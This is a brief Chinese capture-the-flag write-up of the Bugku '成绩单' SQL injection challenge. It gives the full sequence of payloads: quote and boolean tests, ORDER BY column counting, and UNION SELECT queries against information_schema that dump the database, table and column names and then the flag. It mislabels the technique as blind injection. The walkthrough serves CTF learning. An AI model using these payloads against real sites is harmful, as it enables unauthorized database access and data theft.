BUGKU成绩单(sql)

https://www.cnblogs.com/lzlzzzzzz/p/11681309.html

1.打开题目，输入1,2,3分别有结果，说明和sql有关。
2.输入1’ and 1=2# 不正常
输入id=1 and 1=2# 正常
tip:发现–+无法使用，所以用#
说明是字符串盲注
3.猜解列数
输入1’ order by 4#返回正常，输入1’ order by 5#返回异常，看来的确是4列
4.开始**
首先爆库名：通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag

接下来爆表名：id=-1’union select 1,2,3,group_concat(table_name)from information_schema.tables where table_schema=database()# 表名有两个 猜测flag在fl4g中

接下来开始爆字段：-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘skctf_flag’ and table_name = ‘fl4g’),3 ,4#
得到字段 skctf_flag

-1’union select 1,2,3,skctf_flag from fl4g#
得到flag